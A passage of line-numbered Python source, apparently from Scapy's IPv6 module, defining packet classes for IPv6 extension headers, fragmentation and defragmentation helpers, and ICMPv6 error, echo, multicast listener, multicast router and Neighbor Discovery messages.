    921             curpos += len(pstr)
    922             s += pstr
    924         # Let's make the class including our option field
    925         # a multiple of 8 octets long
    926         d = curpos % 8
    927         if d == 0:
    928             return s
    929         d = 8 - d
    930         if d == 1:
    931             s += raw(Pad1())
    932         elif d != 0:
    933             s += raw(PadN(optdata=b'\x00'*(d-2)))
    935         return s
    937     def addfield(self, pkt, s, val):
    938         return s+self.i2m(pkt, val)
    940 class _PhantomAutoPadField(ByteField):
    941     def addfield(self, pkt, s, val):
    942         return s
    944     def getfield(self, pkt, s):
    945         return s, 1
    947     def i2repr(self, pkt, x):
    948         if x:
    949             return "On"
    950         return "Off"
    953 class IPv6ExtHdrHopByHop(_IPv6ExtHdr):
    954     name = "IPv6 Extension Header - Hop-by-Hop Options Header"
    955     fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
    956                     FieldLenField("len", None, length_of="options", fmt="B",
    957                                   adjust = lambda pkt,x: (x+2+7)//8 - 1),
    958                     _PhantomAutoPadField("autopad", 1), # autopad activated by default
    959                     _HopByHopOptionsField("options", [], HBHOptUnknown, 2,
    960                                           length_from = lambda pkt: (8*(pkt.len+1))-2) ]
    961     overload_fields = {IPv6: { "nh": 0 }}
    964 ######################## Destination Option Header ##########################
    966 class IPv6ExtHdrDestOpt(_IPv6ExtHdr):
    967     name = "IPv6 Extension Header - Destination Options Header"
    968     fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
    969                     FieldLenField("len", None, length_of="options", fmt="B",
    970                                   adjust = lambda pkt,x: (x+2+7)//8 - 1),
    971                     _PhantomAutoPadField("autopad", 1), # autopad activated by default
    972                     _HopByHopOptionsField("options", [], HBHOptUnknown, 2,
    973                                           length_from = lambda pkt: (8*(pkt.len+1))-2) ]
    974     overload_fields = {IPv6: { "nh": 60 }}
    977 ############################# Routing Header ################################
    979 class IPv6ExtHdrRouting(_IPv6ExtHdr):
    980     name = "IPv6 Option Header Routing"
    981     fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
    982                     FieldLenField("len", None, count_of="addresses", fmt="B",
    983                                   adjust = lambda pkt,x:2*x), # in 8 bytes blocks
    984                     ByteField("type", 0),
    985                     ByteField("segleft", None),
    986                     BitField("reserved", 0, 32), # There is meaning in this field ...
    987                     IP6ListField("addresses", [],
    988                                  length_from = lambda pkt: 8*pkt.len)]
    989     overload_fields = {IPv6: { "nh": 43 }}
    991     def post_build(self, pkt, pay):
    992         if self.segleft is None:
    993             pkt = pkt[:3]+struct.pack("B", len(self.addresses))+pkt[4:]
    994         return _IPv6ExtHdr.post_build(self, pkt, pay)
    997 ######################### Segment Routing Header ############################
    999 # This implementation is based on draft 06, available at:
   1000 # https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06
   1002 class IPv6ExtHdrSegmentRoutingTLV(Packet):
   1003     name = "IPv6 Option Header Segment Routing - Generic TLV"
   1004     fields_desc = [ ByteField("type", 0),
   1005                     ByteField("len", 0),
   1006                     ByteField("reserved", 0),
   1007                     ByteField("flags", 0),
   1008                     StrLenField("value", "", length_from=lambda pkt: pkt.len) ]
   1010     def extract_padding(self, p):
   1011         return b"",p
   1013     registered_sr_tlv = {}
   1014     @classmethod
   1015     def register_variant(cls):
   1016         cls.registered_sr_tlv[cls.type.default] = cls
   1018     @classmethod
   1019     def dispatch_hook(cls, pkt=None, *args, **kargs):
   1020         if pkt:
   1021             tmp_type = orb(pkt[0])
   1022             return cls.registered_sr_tlv.get(tmp_type, cls)
   1023         return cls
   1026 class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV):
   1027     name = "IPv6 Option Header Segment Routing - Ingress Node TLV"
   1028     fields_desc = [ ByteField("type", 1),
   1029                     ByteField("len", 18),
   1030                     ByteField("reserved", 0),
   1031                     ByteField("flags", 0),
   1032                     IP6Field("ingress_node", "::1") ]
   1035 class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV):
   1036     name = "IPv6 Option Header Segment Routing - Egress Node TLV"
   1037     fields_desc = [ ByteField("type", 2),
   1038                     ByteField("len", 18),
   1039                     ByteField("reserved", 0),
   1040                     ByteField("flags", 0),
   1041                     IP6Field("egress_node", "::1") ]
   1044 class IPv6ExtHdrSegmentRoutingTLVPadding(IPv6ExtHdrSegmentRoutingTLV):
   1045     name = "IPv6 Option Header Segment Routing - Padding TLV"
   1046     fields_desc = [ ByteField("type", 4),
   1047                     FieldLenField("len", None, length_of="padding", fmt="B"),
   1048                     StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len) ]
   1051 class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr):
   1052     name = "IPv6 Option Header Segment Routing"
   1053     fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
   1054                     ByteField("len", None),
   1055                     ByteField("type", 4),
   1056                     ByteField("segleft", None),
   1057                     ByteField("lastentry", None),
   1058                     BitField("unused1", 0, 1),
   1059                     BitField("protected", 0, 1),
   1060                     BitField("oam", 0, 1),
   1061                     BitField("alert", 0, 1),
   1062                     BitField("hmac", 0, 1),
   1063                     BitField("unused2", 0, 3),
   1064                     ShortField("tag", 0),
   1065                     IP6ListField("addresses", ["::1"],
   1066                         count_from=lambda pkt: pkt.lastentry),
   1067                     PacketListField("tlv_objects", [], IPv6ExtHdrSegmentRoutingTLV,
   1068                         length_from=lambda pkt: 8*pkt.len - 16*pkt.lastentry) ]
   1070     overload_fields = { IPv6: { "nh": 43 } }
   1072     def post_build(self, pkt, pay):
   1074         if self.len is None:
   1076             # The extension must be align on 8 bytes
   1077             tmp_mod = (len(pkt) - 8) % 8
   1078             if tmp_mod == 1:
   1079                 warning("IPv6ExtHdrSegmentRouting(): can't pad 1 byte !")
   1080             elif tmp_mod >= 2:
   1081                 #Add the padding extension
   1082                 tmp_pad = b"\x00" * (tmp_mod-2)
   1083                 tlv = IPv6ExtHdrSegmentRoutingTLVPadding(padding=tmp_pad)
   1084                 pkt += raw(tlv)
   1086             tmp_len = (len(pkt) - 8) // 8
   1087             pkt = pkt[:1] + struct.pack("B", tmp_len)+ pkt[2:]
   1089         if self.segleft is None:
   1090             tmp_len = len(self.addresses)
   1091             if tmp_len:
   1092                 tmp_len -= 1
   1093             pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:]
   1095         if self.lastentry is None:
   1096             pkt = pkt[:4] + struct.pack("B", len(self.addresses)) + pkt[5:]
   1098         return _IPv6ExtHdr.post_build(self, pkt, pay) 
   1101 ########################### Fragmentation Header ############################
   1103 class IPv6ExtHdrFragment(_IPv6ExtHdr):
   1104     name = "IPv6 Extension Header - Fragmentation header"
   1105     fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
   1106                     BitField("res1", 0, 8),
   1107                     BitField("offset", 0, 13),
   1108                     BitField("res2", 0, 2),
   1109                     BitField("m", 0, 1),
   1110                     IntField("id", None) ]
   1111     overload_fields = {IPv6: { "nh": 44 }}
   1114 def defragment6(packets):
   1115     """
   1116     Performs defragmentation of a list of IPv6 packets. Packets are reordered.
   1117     Crap is dropped. What lacks is completed by 'X' characters.
   1118     """
   1120     l = [x for x in packets if IPv6ExtHdrFragment in x] # remove non fragments
   1121     if not l:
   1122         return []
   1124     id = l[0][IPv6ExtHdrFragment].id
   1126     llen = len(l)
   1127     l = [x for x in l if x[IPv6ExtHdrFragment].id == id]
   1128     if len(l) != llen:
   1129         warning("defragment6: some fragmented packets have been removed from list")
   1130     llen = len(l)
   1132     # reorder fragments
   1133     res = []
   1134     while l:
   1135         min_pos = 0
   1136         min_offset  = l[0][IPv6ExtHdrFragment].offset
   1137         for p in l:
   1138             cur_offset = p[IPv6ExtHdrFragment].offset
   1139             if cur_offset < min_offset:
   1140                 min_pos = 0
   1141                 min_offset  = cur_offset
   1142         res.append(l[min_pos])
   1143         del(l[min_pos])
   1145     # regenerate the fragmentable part
   1146     fragmentable = b""
   1147     for p in res:
   1148         q=p[IPv6ExtHdrFragment]
   1149         offset = 8*q.offset
   1150         if offset != len(fragmentable):
   1151             warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset))
   1152         fragmentable += b"X"*(offset - len(fragmentable))
   1153         fragmentable += raw(q.payload)
   1155     # Regenerate the unfragmentable part.
   1156     q = res[0]
   1157     nh = q[IPv6ExtHdrFragment].nh
   1158     q[IPv6ExtHdrFragment].underlayer.nh = nh
   1159     del q[IPv6ExtHdrFragment].underlayer.payload
   1160     q /= conf.raw_layer(load=fragmentable)
   1162     return IPv6(raw(q))
   1165 def fragment6(pkt, fragSize):
   1166     """
   1167     Performs fragmentation of an IPv6 packet. Provided packet ('pkt') must already
   1168     contain an IPv6ExtHdrFragment() class. 'fragSize' argument is the expected
   1169     maximum size of fragments (MTU). The list of packets is returned.
   1171     If packet does not contain an IPv6ExtHdrFragment class, it is returned in
   1172     result list.
   1173     """
   1175     pkt = pkt.copy()
   1177     if not IPv6ExtHdrFragment in pkt:
   1178         # TODO : automatically add a fragment before upper Layer
   1179         #        at the moment, we do nothing and return initial packet
   1180         #        as single element of a list
   1181         return [pkt]
   1183     # If the payload is bigger than 65535, a Jumbo payload must be used, as
   1184     # an IPv6 packet can't be bigger than 65535 bytes.
   1185     if len(raw(pkt[IPv6ExtHdrFragment])) > 65535:
   1186       warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.")
   1187       return []
   1189     s = raw(pkt) # for instantiation to get upper layer checksum right
   1191     if len(s) <= fragSize:
   1192         return [pkt]
   1194     # Fragmentable part : fake IPv6 for Fragmentable part length computation
   1195     fragPart = pkt[IPv6ExtHdrFragment].payload
   1196     tmp = raw(IPv6(src="::1", dst="::1")/fragPart)
   1197     fragPartLen = len(tmp) - 40  # basic IPv6 header length
   1198     fragPartStr = s[-fragPartLen:]
   1200     # Grab Next Header for use in Fragment Header
   1201     nh = pkt[IPv6ExtHdrFragment].nh
   1203     # Keep fragment header
   1204     fragHeader = pkt[IPv6ExtHdrFragment]
   1205     del fragHeader.payload # detach payload
   1207     # Unfragmentable Part
   1208     unfragPartLen = len(s) - fragPartLen - 8
   1209     unfragPart = pkt
   1210     del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload
   1212     # Cut the fragmentable part to fit fragSize. Inner fragments have
   1213     # a length that is an integer multiple of 8 octets. last Frag MTU
   1214     # can be anything below MTU
   1215     lastFragSize = fragSize - unfragPartLen - 8
   1216     innerFragSize = lastFragSize - (lastFragSize % 8)
   1218     if lastFragSize <= 0 or innerFragSize == 0:
   1219         warning("Provided fragment size value is too low. " +
   1220                 "Should be more than %d" % (unfragPartLen + 8))
   1221         return [unfragPart/fragHeader/fragPart]
   1223     remain = fragPartStr
   1224     res = []
   1225     fragOffset = 0     # offset, incremeted during creation
   1226     fragId = random.randint(0,0xffffffff) # random id ...
   1227     if fragHeader.id is not None:  # ... except id provided by user
   1228         fragId = fragHeader.id
   1229     fragHeader.m = 1
   1230     fragHeader.id = fragId
   1231     fragHeader.nh = nh
   1233     # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ...
   1234     while True:
   1235         if (len(remain) > lastFragSize):
   1236             tmp = remain[:innerFragSize]
   1237             remain = remain[innerFragSize:]
   1238             fragHeader.offset = fragOffset    # update offset
   1239             fragOffset += (innerFragSize // 8)  # compute new one
   1240             if IPv6 in unfragPart:
   1241                 unfragPart[IPv6].plen = None
   1242             tempo = unfragPart/fragHeader/conf.raw_layer(load=tmp)
   1243             res.append(tempo)
   1244         else:
   1245             fragHeader.offset = fragOffset    # update offSet
   1246             fragHeader.m = 0
   1247             if IPv6 in unfragPart:
   1248                 unfragPart[IPv6].plen = None
   1249             tempo = unfragPart/fragHeader/conf.raw_layer(load=remain)
   1250             res.append(tempo)
   1251             break
   1252     return res
   1255 ############################### AH Header ###################################
   1257 # class _AHFieldLenField(FieldLenField):
   1258 #     def getfield(self, pkt, s):
   1259 #         l = getattr(pkt, self.fld)
   1260 #         l = (l*8)-self.shift
   1261 #         i = self.m2i(pkt, s[:l])
   1262 #         return s[l:],i
   1264 # class _AHICVStrLenField(StrLenField):
   1265 #     def i2len(self, pkt, x):
   1269 # class IPv6ExtHdrAH(_IPv6ExtHdr):
   1270 #     name = "IPv6 Extension Header - AH"
   1271 #     fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
   1272 #                     _AHFieldLenField("len", None, "icv"),
   1273 #                     ShortField("res", 0),
   1274 #                     IntField("spi", 0),
   1275 #                     IntField("sn", 0),
   1276 #                     _AHICVStrLenField("icv", None, "len", shift=2) ]
   1277 #     overload_fields = {IPv6: { "nh": 51 }}
   1279 #     def post_build(self, pkt, pay):
   1280 #         if self.len is None:
   1281 #             pkt = pkt[0]+struct.pack("!B", 2*len(self.addresses))+pkt[2:]
   1282 #         if self.segleft is None:
   1283 #             pkt = pkt[:3]+struct.pack("!B", len(self.addresses))+pkt[4:]
   1284 #         return _IPv6ExtHdr.post_build(self, pkt, pay)
   1287 ############################### ESP Header ##################################
   1289 # class IPv6ExtHdrESP(_IPv6extHdr):
   1290 #     name = "IPv6 Extension Header - ESP"
   1291 #     fields_desc = [ IntField("spi", 0),
   1292 #                     IntField("sn", 0),
   1293 #                     # there is things to extract from IKE work
   1294 #                     ]
   1295 #     overloads_fields = {IPv6: { "nh": 50 }}
   1299 #############################################################################
   1300 #############################################################################
   1301 ###                           ICMPv6* Classes                             ###
   1302 #############################################################################
   1303 #############################################################################
   1305 icmp6typescls = {    1: "ICMPv6DestUnreach",
   1306                      2: "ICMPv6PacketTooBig",
   1307                      3: "ICMPv6TimeExceeded",
   1308                      4: "ICMPv6ParamProblem",
   1309                    128: "ICMPv6EchoRequest",
   1310                    129: "ICMPv6EchoReply",
   1311                    130: "ICMPv6MLQuery",
   1312                    131: "ICMPv6MLReport",
   1313                    132: "ICMPv6MLDone",
   1314                    133: "ICMPv6ND_RS",
   1315                    134: "ICMPv6ND_RA",
   1316                    135: "ICMPv6ND_NS",
   1317                    136: "ICMPv6ND_NA",
   1318                    137: "ICMPv6ND_Redirect",
   1319                   #138: Do Me - RFC 2894 - Seems painful
   1320                    139: "ICMPv6NIQuery",
   1321                    140: "ICMPv6NIReply",
   1322                    141: "ICMPv6ND_INDSol",
   1323                    142: "ICMPv6ND_INDAdv",
   1324                   #143: Do Me - RFC 3810
   1325                    144: "ICMPv6HAADRequest",
   1326                    145: "ICMPv6HAADReply",
   1327                    146: "ICMPv6MPSol",
   1328                    147: "ICMPv6MPAdv",
   1329                   #148: Do Me - SEND related - RFC 3971
   1330                   #149: Do Me - SEND related - RFC 3971
   1331                    151: "ICMPv6MRD_Advertisement",
   1332                    152: "ICMPv6MRD_Solicitation",
   1333                    153: "ICMPv6MRD_Termination",
   1334                    }
   1336 icmp6typesminhdrlen = {    1: 8,
   1337                            2: 8,
   1338                            3: 8,
   1339                            4: 8,
   1340                          128: 8,
   1341                          129: 8,
   1342                          130: 24,
   1343                          131: 24,
   1344                          132: 24,
   1345                          133: 8,
   1346                          134: 16,
   1347                          135: 24,
   1348                          136: 24,
   1349                          137: 40,
   1350                          #139:
   1351                          #140
   1352                          141: 8,
   1353                          142: 8,
   1354                          144: 8,
   1355                          145: 8,
   1356                          146: 8,
   1357                          147: 8,
   1358                          151: 8,
   1359                          152: 4,
   1360                          153: 4
   1361                    }
   1363 icmp6types = { 1 : "Destination unreachable",
   1364                2 : "Packet too big",
   1365                3 : "Time exceeded",
   1366                4 : "Parameter problem",
   1367              100 : "Private Experimentation",
   1368              101 : "Private Experimentation",
   1369              128 : "Echo Request",
   1370              129 : "Echo Reply",
   1371              130 : "MLD Query",
   1372              131 : "MLD Report",
   1373              132 : "MLD Done",
   1374              133 : "Router Solicitation",
   1375              134 : "Router Advertisement",
   1376              135 : "Neighbor Solicitation",
   1377              136 : "Neighbor Advertisement",
   1378              137 : "Redirect Message",
   1379              138 : "Router Renumbering",
   1380              139 : "ICMP Node Information Query",
   1381              140 : "ICMP Node Information Response",
   1382              141 : "Inverse Neighbor Discovery Solicitation Message",
   1383              142 : "Inverse Neighbor Discovery Advertisement Message",
   1384              143 : "Version 2 Multicast Listener Report",
   1385              144 : "Home Agent Address Discovery Request Message",
   1386              145 : "Home Agent Address Discovery Reply Message",
   1387              146 : "Mobile Prefix Solicitation",
   1388              147 : "Mobile Prefix Advertisement",
   1389              148 : "Certification Path Solicitation",
   1390              149 : "Certification Path Advertisement",
   1391              151 : "Multicast Router Advertisement",
   1392              152 : "Multicast Router Solicitation",
   1393              153 : "Multicast Router Termination",
   1394              200 : "Private Experimentation",
   1395              201 : "Private Experimentation" }
   1398 class _ICMPv6(Packet):
   1399     name = "ICMPv6 dummy class"
   1400     overload_fields = {IPv6: {"nh": 58}}
   1401     def post_build(self, p, pay):
   1402         p += pay
   1403         if self.cksum == None:
   1404             chksum = in6_chksum(58, self.underlayer, p)
   1405             p = p[:2]+struct.pack("!H", chksum)+p[4:]
   1406         return p
   1408     def hashret(self):
   1409         return self.payload.hashret()
   1411     def answers(self, other):
   1412         # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
   1413         if (isinstance(self.underlayer, IPerror6) or
   1414             isinstance(self.underlayer, _IPv6ExtHdr) and
   1415             isinstance(other, _ICMPv6)):
   1416             if not ((self.type == other.type) and
   1417                     (self.code == other.code)):
   1418                 return 0
   1419             return 1
   1420         return 0
   1423 class _ICMPv6Error(_ICMPv6):
   1424     name = "ICMPv6 errors dummy class"
   1425     def guess_payload_class(self,p):
   1426         return IPerror6
   1428 class ICMPv6Unknown(_ICMPv6):
   1429     name = "Scapy6 ICMPv6 fallback class"
   1430     fields_desc = [ ByteEnumField("type",1, icmp6types),
   1431                     ByteField("code",0),
   1432                     XShortField("cksum", None),
   1433                     StrField("msgbody", "")]
   1436 ################################## RFC 2460 #################################
   1438 class ICMPv6DestUnreach(_ICMPv6Error):
   1439     name = "ICMPv6 Destination Unreachable"
   1440     fields_desc = [ ByteEnumField("type",1, icmp6types),
   1441                     ByteEnumField("code",0, { 0: "No route to destination",
   1442                                               1: "Communication with destination administratively prohibited",
   1443                                               2: "Beyond scope of source address",
   1444                                               3: "Address unreachable",
   1445                                               4: "Port unreachable" }),
   1446                     XShortField("cksum", None),
   1447                     ByteField("length", 0),
   1448                     X3BytesField("unused",0)]
   1450 class ICMPv6PacketTooBig(_ICMPv6Error):
   1451     name = "ICMPv6 Packet Too Big"
   1452     fields_desc = [ ByteEnumField("type",2, icmp6types),
   1453                     ByteField("code",0),
   1454                     XShortField("cksum", None),
   1455                     IntField("mtu",1280)]
   1457 class ICMPv6TimeExceeded(_ICMPv6Error):
   1458     name = "ICMPv6 Time Exceeded"
   1459     fields_desc = [ ByteEnumField("type",3, icmp6types),
   1460                     ByteEnumField("code",0, { 0: "hop limit exceeded in transit",
   1461                                               1: "fragment reassembly time exceeded"}),
   1462                     XShortField("cksum", None),
   1463                     ByteField("length", 0),
   1464                     X3BytesField("unused",0)]
   1466 # The default pointer value is set to the next header field of
   1467 # the encapsulated IPv6 packet
   1468 class ICMPv6ParamProblem(_ICMPv6Error):
   1469     name = "ICMPv6 Parameter Problem"
   1470     fields_desc = [ ByteEnumField("type",4, icmp6types),
   1471                     ByteEnumField("code",0, {0: "erroneous header field encountered",
   1472                                              1: "unrecognized Next Header type encountered",
   1473                                              2: "unrecognized IPv6 option encountered"}),
   1474                     XShortField("cksum", None),
   1475                     IntField("ptr",6)]
   1477 class ICMPv6EchoRequest(_ICMPv6):
   1478     name = "ICMPv6 Echo Request"
   1479     fields_desc = [ ByteEnumField("type", 128, icmp6types),
   1480                     ByteField("code", 0),
   1481                     XShortField("cksum", None),
   1482                     XShortField("id",0),
   1483                     XShortField("seq",0),
   1484                     StrField("data", "")]
   1485     def mysummary(self):
   1486         return self.sprintf("%name% (id: %id% seq: %seq%)")
   1487     def hashret(self):
   1488         return struct.pack("HH",self.id,self.seq)+self.payload.hashret()
   1491 class ICMPv6EchoReply(ICMPv6EchoRequest):
   1492     name = "ICMPv6 Echo Reply"
   1493     type = 129
   1494     def answers(self, other):
   1495         # We could match data content between request and reply.
   1496         return (isinstance(other, ICMPv6EchoRequest) and
   1497                 self.id == other.id and self.seq == other.seq and
   1498                 self.data == other.data)
   1501 ############ ICMPv6 Multicast Listener Discovery (RFC3810) ##################
   1503 # tous les messages MLD sont emis avec une adresse source lien-locale
   1504 # -> Y veiller dans le post_build si aucune n'est specifiee
   1505 # La valeur de Hop-Limit doit etre de 1
   1506 # "and an IPv6 Router Alert option in a Hop-by-Hop Options
   1507 # header. (The router alert option is necessary to cause routers to
   1508 # examine MLD messages sent to multicast addresses in which the router
   1509 # itself has no interest"
   1510 class _ICMPv6ML(_ICMPv6):
   1511     fields_desc = [ ByteEnumField("type", 130, icmp6types),
   1512                     ByteField("code", 0),
   1513                     XShortField("cksum", None),
   1514                     ShortField("mrd", 0),
   1515                     ShortField("reserved", 0),
   1516                     IP6Field("mladdr","::")]
   1518 # general queries are sent to the link-scope all-nodes multicast
   1519 # address ff02::1, with a multicast address field of 0 and a MRD of
   1520 # [Query Response Interval]
   1521 # Default value for mladdr is set to 0 for a General Query, and
   1522 # overloaded by the user for a Multicast Address specific query
   1523 # TODO : See what we can do to automatically include a Router Alert
   1524 #        Option in a Destination Option Header.
   1525 class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710
   1526     name = "MLD - Multicast Listener Query"
   1527     type   = 130
   1528     mrd    = 10000 # 10s for mrd
   1529     mladdr = "::"
   1530     overload_fields = {IPv6: { "dst": "ff02::1", "hlim": 1, "nh": 58 }}
   1531     def hashret(self):
   1532         if self.mladdr != "::":
   1533             return (
   1534                 inet_pton(socket.AF_INET6, self.mladdr) + self.payload.hashret()
   1535             )
   1536         else:
   1537             return self.payload.hashret()
   1540 # TODO : See what we can do to automatically include a Router Alert
   1541 #        Option in a Destination Option Header.
   1542 class ICMPv6MLReport(_ICMPv6ML): # RFC 2710
   1543     name = "MLD - Multicast Listener Report"
   1544     type = 131
   1545     overload_fields = {IPv6: {"hlim": 1, "nh": 58}}
   1546     # implementer le hashret et le answers
   1548 # When a node ceases to listen to a multicast address on an interface,
   1549 # it SHOULD send a single Done message to the link-scope all-routers
   1550 # multicast address (FF02::2), carrying in its multicast address field
   1551 # the address to which it is ceasing to listen
   1552 # TODO : See what we can do to automatically include a Router Alert
   1553 #        Option in a Destination Option Header.
   1554 class ICMPv6MLDone(_ICMPv6ML): # RFC 2710
   1555     name = "MLD - Multicast Listener Done"
   1556     type = 132
   1557     overload_fields = {IPv6: { "dst": "ff02::2", "hlim": 1, "nh": 58}}
   1560 ########## ICMPv6 MRD - Multicast Router Discovery (RFC 4286) ###############
   1562 # TODO:
   1563 # - 04/09/06 troglocan : find a way to automatically add a router alert
   1564 #            option for all MRD packets. This could be done in a specific
   1565 #            way when IPv6 is the under layer with some specific keyword
   1566 #            like 'exthdr'. This would allow to keep compatibility with
   1567 #            providing IPv6 fields to be overloaded in fields_desc.
   1568 #
   1569 #            At the moment, if user inserts an IPv6 Router alert option
   1570 #            none of the IPv6 default values of IPv6 layer will be set.
   1572 class ICMPv6MRD_Advertisement(_ICMPv6):
   1573     name = "ICMPv6 Multicast Router Discovery Advertisement"
   1574     fields_desc = [ByteEnumField("type", 151, icmp6types),
   1575                    ByteField("advinter", 20),
   1576                    XShortField("cksum", None),
   1577                    ShortField("queryint", 0),
   1578                    ShortField("robustness", 0)]
   1579     overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::2"}}
   1580                        # IPv6 Router Alert requires manual inclusion
   1581     def extract_padding(self, s):
   1582         return s[:8], s[8:]
   1584 class ICMPv6MRD_Solicitation(_ICMPv6):
   1585     name = "ICMPv6 Multicast Router Discovery Solicitation"
   1586     fields_desc = [ByteEnumField("type", 152, icmp6types),
   1587                    ByteField("res", 0),
   1588                    XShortField("cksum", None) ]
   1589     overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::2"}}
   1590                        # IPv6 Router Alert requires manual inclusion
   1591     def extract_padding(self, s):
   1592         return s[:4], s[4:]
   1594 class ICMPv6MRD_Termination(_ICMPv6):
   1595     name = "ICMPv6 Multicast Router Discovery Termination"
   1596     fields_desc = [ByteEnumField("type", 153, icmp6types),
   1597                    ByteField("res", 0),
   1598                    XShortField("cksum", None) ]
   1599     overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::6A"}}
   1600                        # IPv6 Router Alert requires manual inclusion
   1601     def extract_padding(self, s):
   1602         return s[:4], s[4:]
   1605 ################### ICMPv6 Neighbor Discovery (RFC 2461) ####################
   1607 icmp6ndopts = { 1: "Source Link-Layer Address",
   1608                 2: "Target Link-Layer Address",
   1609                 3: "Prefix Information",
   1610                 4: "Redirected Header",
   1611                 5: "MTU",
   1612                 6: "NBMA Shortcut Limit Option", # RFC2491
   1613                 7: "Advertisement Interval Option",
   1614                 8: "Home Agent Information Option",
   1615                 9: "Source Address List",
   1616                10: "Target Address List",
   1617                11: "CGA Option",            # RFC 3971
   1618                12: "RSA Signature Option",  # RFC 3971
   1619                13: "Timestamp Option",      # RFC 3971
   1620                14: "Nonce option",          # RFC 3971
   1621                15: "Trust Anchor Option",   # RFC 3971
   1622                16: "Certificate Option",    # RFC 3971
   1623                17: "IP Address Option",                             # RFC 4068
   1624                18: "New Router Prefix Information Option",          # RFC 4068
   1625                19: "Link-layer Address Option",                     # RFC 4068
   1626                20: "Neighbor Advertisement Acknowledgement Option",
   1627                21: "CARD Request Option", # RFC 4065/4066/4067
   1628                22: "CARD Reply Option",   # RFC 4065/4066/4067
   1629                23: "MAP Option",          # RFC 4140
   1630                24: "Route Information Option",  # RFC 4191
   1631                25: "Recusive DNS Server Option",
   1632                26: "IPv6 Router Advertisement Flags Option"
   1633                 }
   1635 icmp6ndoptscls = { 1: "ICMPv6NDOptSrcLLAddr",
   1636                    2: "ICMPv6NDOptDstLLAddr",
   1637                    3: "ICMPv6NDOptPrefixInfo",
   1638                    4: "ICMPv6NDOptRedirectedHdr",
   1639                    5: "ICMPv6NDOptMTU",
   1640                    6: "ICMPv6NDOptShortcutLimit",
   1641                    7: "ICMPv6NDOptAdvInterval",
   1642                    8: "ICMPv6NDOptHAInfo",
   1643                    9: "ICMPv6NDOptSrcAddrList",
   1644                   10: "ICMPv6NDOptTgtAddrList",
   1645                   #11: Do Me,
   1646                   #12: Do Me,
   1647                   #13: Do Me,
   1648                   #14: Do Me,
   1649                   #15: Do Me,
   1650                   #16: Do Me,
   1651                   17: "ICMPv6NDOptIPAddr",
   1652                   18: "ICMPv6NDOptNewRtrPrefix",
   1653                   19: "ICMPv6NDOptLLA",
   1654                   #18: Do Me,
   1655                   #19: Do Me,
   1656                   #20: Do Me,
   1657                   #21: Do Me,
   1658                   #22: Do Me,
   1659                   23: "ICMPv6NDOptMAP",
   1660                   24: "ICMPv6NDOptRouteInfo",
   1661                   25: "ICMPv6NDOptRDNSS",
   1662                   26: "ICMPv6NDOptEFA",
   1663                   31: "ICMPv6NDOptDNSSL"
   1664                   }
   1666 class _ICMPv6NDGuessPayload:
   1667     name = "Dummy ND class that implements guess_payload_class()"
   1668     def guess_payload_class(self,p):
   1669         if len(p) > 1:
   1670             return get_cls(icmp6ndoptscls.get(orb(p[0]),"Raw"), "Raw") # s/Raw/ICMPv6NDOptUnknown/g ?
   1673 # Beginning of ICMPv6 Neighbor Discovery Options.
   1675 class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
   1676     name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
   1677     fields_desc = [ ByteField("type",None),
   1678                     FieldLenField("len",None,length_of="data",fmt="B",
   1679                                   adjust = lambda pkt,x: x+2),
   1680                     StrLenField("data","",
   1681                                 length_from = lambda pkt: pkt.len-2) ]
   1683 # NOTE: len includes type and len field. Expressed in unit of 8 bytes
   1684 # TODO: Revoir le coup du ETHER_ANY
   1685 class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
   1686     name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
   1687     fields_desc = [ ByteField("type", 1),
   1688                     ByteField("len", 1),
   1689                     MACField("lladdr", ETHER_ANY) ]
   1690     def mysummary(self):
   1691         return self.sprintf("%name% %lladdr%")
   1693 class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
   1694     name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
   1695     type = 2
   1697 class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
   1698     name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
   1699     fields_desc = [ ByteField("type",3),
   1700                     ByteField("len",4),
   1701                     ByteField("prefixlen",None),
   1702                     BitField("L",1,1),
   1703                     BitField("A",1,1),
   1704                     BitField("R",0,1),
   1705                     BitField("res1",0,5),
   1706                     XIntField("validlifetime",0xffffffff),
   1707                     XIntField("preferredlifetime",0xffffffff),
   1708                     XIntField("res2",0x00000000),
   1709                     IP6Field("prefix","::") ]
   1710     def mysummary(self):
   1711         return self.sprintf("%name% %prefix%")
   1713 # TODO: We should also limit the size of included packet to something
   1714 # like (initiallen - 40 - 2)
   1715 class TruncPktLenField(PacketLenField):
   1716     __slots__ = ["cur_shift"]
   1718     def __init__(self, name, default, cls, cur_shift, length_from=None, shift=0):
   1719         PacketLenField.__init__(self, name, default, cls, length_from=length_from)
   1720         self.cur_shift = cur_shift
   1722     def getfield(self, pkt, s):
   1723         l = self.length_from(pkt)
   1724         i = self.m2i(pkt, s[:l])
   1725         return s[l:],i
   1727     def m2i(self, pkt, m):
   1728         s = None
   1729         try: # It can happen we have sth shorter than 40 bytes
   1730             s = self.cls(m)
   1731         except:
   1732             return conf.raw_layer(m)
   1733         return s
